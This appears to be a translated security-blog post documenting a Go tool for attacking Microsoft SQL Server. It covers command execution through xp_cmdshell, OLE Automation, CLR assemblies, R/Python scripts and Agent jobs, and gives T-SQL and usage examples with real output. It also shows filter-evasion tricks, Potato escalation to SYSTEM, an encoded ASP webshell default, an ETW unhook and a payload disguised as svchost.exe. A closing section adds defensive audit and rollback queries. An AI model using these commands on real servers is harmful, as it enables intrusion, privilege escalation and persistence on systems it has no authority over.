MSSQL Penetration Testing: A Multi-Function Command Execution Tool
Tool overview
@Mayter wrote this MSSQL exploitation tool in Go, drawing on the projects listed below. It covers command execution with output via xp_cmdshell and sp_oacreate, loading a CLR assembly and running the operations it exposes, file upload, SQL Server Agent jobs, and related tasks. Every path the tool uses (sp_configure, xp_cmdshell, OLE Automation, CLR, external R/Python scripts, Agent jobs) requires a sysadmin-level login such as sa; which OS account the command runs as depends on the path: the SQL Server service account for xp_cmdshell, sp_oacreate and CLR, the Launchpad worker for R/Python, and the Agent service account for job steps, which is what the whoami output in the examples below reflects.
Reference projects:
https://github.com/Ridter/PySQLTools
https://github.com/uknowsec/SharpSQLTools
https://github.com/Ridter/MSSQL_CLR
https://github.com/JKme/cube/blob/master/core/sqlcmdmodule/mssql3.go
https://quan9i.top/post/SQL%20Server%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%96%B9%E5%BC%8F%E6%B1%87%E6%80%BB/

Parameter reference
Help output:
NAME:
   Mssql Toolkit - mssql command tool

USAGE:
   mssql-command-tools_Windows_64.exe [global options] command [command options] [arguments...]

AUTHOR:
   Microsoft.com
   clr reference: https://github.com/uknowsec/SharpSQLTools/

COMMANDS:
   help, h  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --server value, --host value, -s value   The database server (default: "127.0.0.1")
   --user value, -u value                   The database user (default: "sa")
   --password value, -p value               The database password
   --database value, -d value               The database name (default: "msdb")
   --port value, -P value                   The database port (default: 1433)
   --option value                           -x cmd, -X powershell (default: "whoami")
   --query value, -q value, --sql value     SQL query (default: "select @@version")
   --cmd value, -c value, --exec value      Exec System Command | xp_cmdshell command execution (default: "whoami")
   --cmd1 value, --c1 value                 Exec System Command | sp_oacreate, no output (default: "whoami >C:\\whoami.log")
   --cmd2 value, --c2 value                 Exec System Command | sp_oacreate with output | wscript.shell (default: "whoami")
   --cmdsp value                            Exec System Command | sp_oacreate with output | {72C24DD5-D70A-438B-8A42-98424B88AFB8} (default: "whoami")
   --cmd3 value, --c3 value                 Exec System Command | CLR execution | CLR command reference: https://github.com/uknowsec/SharpSQLTools/ (default: "clr_exec whoami")
   --cmdpy value                            Exec System Command | CLR execution | CLR command reference: https://github.com/Ridter/PySQLTools (default: "clr_exec whoami")
   --cmd4 value, --c4 value                 Exec System Command | custom CLR execution (default: "-c4 net -c5 user")
   --cmd5 value, --c5 value                 Exec System Command | custom CLR execution (default: "-c4 net -c5 user")
   --cmd6 value, --c6 value                 Exec System Command | xp_cmdshell execution | statement form that evades filtering of the xp_cmdshell keyword (default: "-c6 whoami")
   --cmd7 value, --c7 value                 Exec System Command | custom CLR execution (default: "-c7 whoami")
   --cmd8 value, --c8 value                 Exec System Command | R language command (default: "-c8 whoami")
   --cmd9 value, --c9 value                 Exec System Command | Python language command (default: "-c9 whoami")
   --cmd10 value, --c10 value               Exec System Command | createAndStartJob command (default: "-c10 whoami >c:\\windows\\temp\\123.txt")
   --cmd11 value, --c11 value               Exec System Command | custom CLR execution | --option -x --cmd11 cmd | --option -X --cmd11 powershell (default: "--option -x --cmd11 cmd")
   --dir value, --dirtree value             xp_dirtree directory listing | dir c:
   --path value                             Web root path, used as -path + -code | c:\inetpub\wwwroot\cmd.asp (default: "c:\\inetpub\\wwwroot\\cmd.asp")
   --local value                            Local path, localFile (default: "c:\\1.txt")
   --remote value                           Remote path, remoteFile (default: "C:\\Windows\\Temp\\1.txt")
   --code value                             -path + -code | escape any " in the code with \ to match <%eval request("cmd")%>; default web path and asp password: LandGrey (default: "<%@codepage=65000%><%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>")
   --downurl value                          URL of the file to download | http://www.microsoft.com/defender.exe
   --filepath value                         Path to save the downloaded file | c:\programdata\svchost.exe
   --debug                                  Debug info
   --enable, -e                             Enable xp_cmdshell
   --disable, --diclose                     Disable xp_cmdshell
   --ole, --oleopen                         Enable sp_oacreate
   --dole, --dolose                         Disable sp_oacreate
   --clr, --clropen                         Enable clr enabled
   --dclr, --dclose                         Disable clr enabled
   --rlce, --rlceopen                       Enable R|Python language (external scripts)
   --jobopen                                Start the MSSQL Agent Job service
   --install_clr, --in_clr                  install clr | --cmd3 "clr_exec whoami" | CLR command reference: https://github.com/uknowsec/SharpSQLTools/
   --uninstall_clr, --un_clr                uninstall clr | --cmd3 "clr_exec whoami"
   --installpy_clr, --inpy_clr              installpy clr | --cmdpy "clr_exec whoami" | CLR command reference: https://github.com/Ridter/PySQLTools
   --uninstallpy_clr, --unpy_clr            uninstallpy clr | --cmdpy "clr_exec whoami"
   --install_clrcmd, --in_clrcmd            install clrcmd | "--c4 net --c5 user"
   --uninstall_clrcmd, --un_clrcmd          uninstall clrcmd | "--c4 net --c5 user"
   --install_clrcmd1, --in_clrcmd1          install clrcmd1 | --cmd7 "whoami"
   --uninstall_clrcmd1, --un_clrcmd1        uninstall clrcmd1 | --cmd7 "whoami"
   --install_clrcmd2, --in_clrcmd2          install clrcmd2 | --cmd11 "whoami"
   --uninstall_clrcmd2, --un_clrcmd2        uninstall clrcmd2 | --cmd11 "whoami"
   --upload                                 --upload --local c:\svchost.exe --remote C:\Windows\Temp\svchost.exe
   --help, -h                               show help
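The switches above are thin wrappers over well-known T-SQL. The batches below are an added example of that underlying T-SQL, written for this page; they are not the tool's own statements (which are not reproduced here) and not code from SharpSQLTools or PySQLTools. The job name, file paths and command strings are placeholders, and the CLR assembly bytes are deliberately omitted.

```sql
-- Added example: the standard T-SQL behind each execution path the tool wraps.
-- All of it needs a sysadmin-level login. Not the tool's own code.

-- 1. xp_cmdshell (--enable / --cmd): runs as the SQL Server service account.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;           RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';
-- A filter that only matches the literal token "xp_cmdshell" is sidestepped by
-- naming the procedure through a variable (generic form, not the tool's --cmd6).
DECLARE @p NVARCHAR(50) = N'xp_' + N'cmdshell';
EXEC @p 'whoami';

-- 2. OLE Automation (--ole / --cmd1 / --cmd2 / --cmdsp). Output is read back from
-- WScript.Shell.Exec's StdOut; the no-output form redirects to a file instead.
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
DECLARE @shell INT, @exec INT, @out INT, @text VARCHAR(8000);
-- The ProgID 'WScript.Shell' and the CLSID {72C24DD5-D70A-438B-8A42-98424B88AFB8}
-- create the same object; the CLSID spelling survives filters on the ProgID.
EXEC sp_oacreate 'WScript.Shell', @shell OUTPUT;
EXEC sp_oamethod @shell, 'Exec', @exec OUTPUT, 'cmd.exe /c whoami';
EXEC sp_oamethod @exec,  'StdOut', @out OUTPUT;
EXEC sp_oamethod @out,   'ReadAll', @text OUTPUT;
SELECT @text AS command_output;
-- Blind variant (--cmd1 style): no result set, read the file later.
EXEC sp_oamethod @shell, 'Run', NULL, 'cmd.exe /c whoami > C:\Windows\Temp\whoami.log';

-- 3. CLR (--clr / --install_clr / --cmd3 / --cmd4.. / --cmd11). Assembly bytes and
-- the wrapper procedure are supplied by the loader projects and omitted here.
EXEC sp_configure 'clr enabled', 1; RECONFIGURE;
-- SQL Server 2017+ refuses UNSAFE assemblies unless strict security is off or the
-- assembly is whitelisted with sp_add_trusted_assembly. msdb is TRUSTWORTHY by
-- default, one reason CLR loaders target it (the tool's default database).
EXEC sp_configure 'clr strict security', 0; RECONFIGURE;
-- CREATE ASSEMBLY [loader] FROM 0x... WITH PERMISSION_SET = UNSAFE;
-- CREATE PROCEDURE clr_exec @cmd NVARCHAR(MAX) AS EXTERNAL NAME [loader].[Class].[Method];

-- 4. External scripts (--rlce / --cmd8 / --cmd9). These run under the Launchpad
-- service's worker accounts, not the SQL Server account, need Machine Learning
-- Services installed, and the first enablement needs a service restart.
EXEC sp_configure 'external scripts enabled', 1; RECONFIGURE;
EXEC sp_execute_external_script
    @language = N'Python',
    @script   = N'import subprocess; print(subprocess.check_output("whoami", shell=True).decode())';
EXEC sp_execute_external_script
    @language = N'R',
    @script   = N'print(system("whoami", intern = TRUE))';

-- 5. Agent job (--jobopen / --cmd10). Needs the SQL Server Agent service running;
-- a CmdExec step runs as the Agent service account (or a proxy) and returns no
-- output, hence the redirect. 'maint_job' is a placeholder name.
USE msdb;
EXEC dbo.sp_add_job       @job_name = N'maint_job';
EXEC dbo.sp_add_jobstep   @job_name = N'maint_job', @step_name = N'step1',
                          @subsystem = N'CmdExec',
                          @command = N'whoami > C:\Windows\Temp\123.txt';
EXEC dbo.sp_add_jobserver @job_name = N'maint_job';
EXEC dbo.sp_start_job     @job_name = N'maint_job';

-- 6. Directory listing (--dir): result columns are subdirectory, depth, file.
EXEC master..xp_dirtree 'C:\ProgramData', 1, 1;
```

Each numbered batch is independent; run only the one matching the switch you are exercising, and note that every one of them flips a server-wide configuration value that stays set until it is explicitly reverted.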
Examples:
Enable the xp_cmdshell component:
    mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin --enable
Enable the sp_oacreate (OLE Automation) component:
    mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin --ole
Enable the CLR component:
    mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin -clr

Execute via xp_cmdshell:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd "whoami"
    nt service\mssqlserver
Bypass filtering of the xp_cmdshell keyword:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd6 "whoami"
    nt service\mssqlserver
Execute via sp_oacreate (the two variants differ slightly in method but behave the same):
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd2 "whoami"
    nt service\mssqlserver
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmdsp "whoami"
    nt service\mssqlserver

Install the SharpSQLTools CLR:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --install_clr
    Clrcmd Install SharpSQLTools CLR Success.
Execute a command through it:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_exec whoami"
    mssql: [+] Process: cmd.exe
    mssql: [+] arguments: /c whoami
    mssql: [+] RunCommand: cmd.exe /c whoami
    mssql:
    mssql: nt service\mssqlserver
Privilege escalation (BadPotato inside the CLR; the service account's SeImpersonatePrivilege is what makes the named-pipe token theft work):
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_badpotato whoami"
    mssql: [*] CreateNamedPipeW Success! IntPtr:4048
    mssql: [*] RpcRemoteFindFirstPrinterChangeNotificationEx Success! IntPtr:1816351484896
    mssql: [*] ConnectNamePipe Success!
    mssql: [*] CurrentUserName : MSSQLSERVER
    mssql: [*] CurrentConnectPipeUserName : SYSTEM
    mssql: [*] ImpersonateNamedPipeClient Success!
    mssql: [*] OpenThreadToken Success! IntPtr:6840
    mssql: [*] DuplicateTokenEx Success! IntPtr:6556
    mssql: [*] SetThreadToken Success!
    mssql: [*] CreateOutReadPipe Success! out_read:5536 out_write:5528
    mssql: [*] CreateErrReadPipe Success! err_read:3436 err_write:5072
    mssql: [*] CreateProcessWithTokenW Success! ProcessPid:9608
    mssql: nt authority\system
Uninstall the SharpSQLTools CLR:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --uninstall_clr
    Uninstall SharpSQLTools CLR Success.

Install the PySQLTools CLR:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --installpy_clr
    Clrcmd Install PySQLTools Clr Success.
Execute a command through it:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmdpy "clr_exec whoami"
    mssql: [+] Successfully unhooked ETW!
    mssql: [*] No dll to patch
    mssql: [+] Process: cmd.exe
    mssql: [+] arguments: /c whoami
    mssql: [+] RunCommand: cmd.exe /c whoami
    mssql:
    mssql: nt service\mssqlserver
Uninstall the PySQLTools CLR:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --uninstallpy_clr
    Uninstall PySQLTools Clr Success.

Custom CLR, two-argument form (-cmd4 is the program, -cmd5 its arguments):
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd4 net -cmd5 user
    User accounts for \\
    -------------------------------------------------------------------------------
    Administrator            DefaultAccount           Guest
    WDAGUtilityAccount
    The command completed with one or more errors.
Custom CLR, single-command form:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd7 "whoami"
    mssql: Command is running, please wait.
    mssql: nt service\mssqlserver
    mssql: nt service\mssqlserver

R language command (default: "-c8 whoami"); note the account is the Launchpad worker, not the SQL Server service:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd8 "whoami"
    nt service\mssqllaunchpad
Python language command (default: "-c9 whoami"):
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd9 "whoami"
    nt service\mssqllaunchpad

Execute via CreateAndStartJob (the job step returns nothing, so redirect output to a file):
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd10 "whoami >c:\\programdata\\test.txt"
    CreateAndStartJob Command Success!
When the Agent service is not running and the current privileges are insufficient to start it, start it as SYSTEM through the CLR EfsPotato:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_efspotato net start SQLSERVERAGENT"

List a directory (xp_dirtree; columns subdirectory, depth, file):
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -dir "c:\\programdata"
    subdirectory depth file
    123.dll
    Application Data
    Documents
    Huorong
    Microsoft
    MSSQLSERVER
    Package Cache
    regid.1991-06.com.microsoft
    SoftwareDistribution
    SSIS
    Telemetry
    Templates
    test.txt
    USOPrivate
    USOShared
    VMware
    「开始」菜单 (Start Menu)
    桌面 (Desktop)
    Command List Dir Success.

-x cmd command:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -option -x --cmd11 "whoami"
    []
    nt service\mssqlserver
-X powershell command:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -option -X --cmd11 "Get-Process explorer"
    []
    Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
    -------  ------    -----      -----     ------     --  -- -----------
       2296     113    71352     183772              1304   1 explorer

Upload a file:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --upload --local c:\Database.dll --remote C:\programdata\Database.dll
    [*] Uploading 'c:\Database.dll' to 'C:\programdata\Database.dll'...
    [!] C:\programdata\Database.dll Upload Success
Confirm with a listing:
    mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -dir "c:\\programdata"
    subdirectory depth file
    123.dll
    Application Data
    Database.dll
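Every path exercised above leaves a server-wide switch set, an assembly registered, or a job row behind. The queries below are an added example, written for this page and not part of the tool, of what a defender or a post-engagement cleanup should check and revert on an instance the tool has touched. The catalog views and configuration names are standard SQL Server; sys.assemblies is per-database, so the assembly query has to be run in each database (msdb in particular, the tool's default).

```sql
-- Added example (not from the tool): audit and roll back the footprint of
-- xp_cmdshell / OLE Automation / CLR / external-script / Agent-job execution.

-- Server-level switches; anything other than 0 here (or 1 for strict security)
-- is worth explaining. Compare against sys.configurations 'value' too: a
-- pending value that differs from value_in_use means RECONFIGURE never ran.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled',
               'clr strict security', 'external scripts enabled');

-- User assemblies that escaped the SAFE sandbox, and the databases whose
-- TRUSTWORTHY bit lets such assemblies load. Run per database.
SELECT DB_NAME() AS database_name, name, permission_set_desc, create_date
FROM sys.assemblies
WHERE is_user_defined = 1 AND permission_set_desc <> 'SAFE_ACCESS';
SELECT name, is_trustworthy_on
FROM sys.databases
WHERE is_trustworthy_on = 1;   -- msdb is expected here; anything else is not

-- Agent jobs with operating-system steps, which is where a createAndStartJob
-- command lands. The CmdExec command text is kept verbatim in sysjobsteps.
SELECT j.name, j.date_created, s.step_name, s.subsystem, s.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell');

-- Revert. The tool's --disable / --dole / --dclr perform the first three;
-- external scripts and 'show advanced options' have no dedicated switch.
EXEC sp_configure 'xp_cmdshell', 0;               RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;  RECONFIGURE;
EXEC sp_configure 'clr enabled', 0;                RECONFIGURE;
EXEC sp_configure 'external scripts enabled', 0;   RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;      RECONFIGURE;
-- Then DROP PROCEDURE / DROP ASSEMBLY for any listed assembly and
-- msdb.dbo.sp_delete_job for any job the audit attributed to the engagement.
```

Disabling the switches does not remove an already-registered UNSAFE assembly or a job; the tool's own --uninstall_* options handle its assemblies, but jobs created with -cmd10 have to be deleted by name.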
Download:
https://github.com/Mayter/mssql-command-tool
Source: Hack分享吧